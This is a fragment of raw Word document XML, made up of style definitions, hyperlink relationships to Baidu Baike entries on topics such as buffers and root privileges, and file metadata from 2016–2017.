    <w:rsid w:val="00FA7206"/>
    <w:rsid w:val="00FD4C7B"/>
    <w:rsid w:val="00F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4769D-3197-49CD-AAB8-EE3F0E3D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nhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00682E0B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A6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3A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3A6E"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE3E9C"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00682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qFormat/>
    <w:rsid w:val="00682E0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682E0B"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Standard">
    <w:name w:val="Standard"/>
    <w:rsid w:val="00682E0B"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:suppressAutoHyphens/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:cs="Lohit Hindi"/>
      <w:kern w:val="3"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char1">
    <w:name w:val="标题 2 Char1"/>
    <w:link w:val="2"/>
    <w:locked/>
    <w:rsid w:val="00682E0B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5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52D02"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FA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A720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A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A72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1A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F1A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aike.baidu.com/item/%E7%BC%93%E5%86%B2%E5%8C%B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1.1.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aike.baidu.com/item/%E5%A0%86%E6%A0%8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baike.baidu.com/item/%E7%BC%93%E5%86%B2%E5%8C%B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6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hit.edu.cn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baike.baidu.com/item/root%E6%9D%83%E9%99%9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Allurelove、瞳</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>lovebear96</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-30T07:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-03T01:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>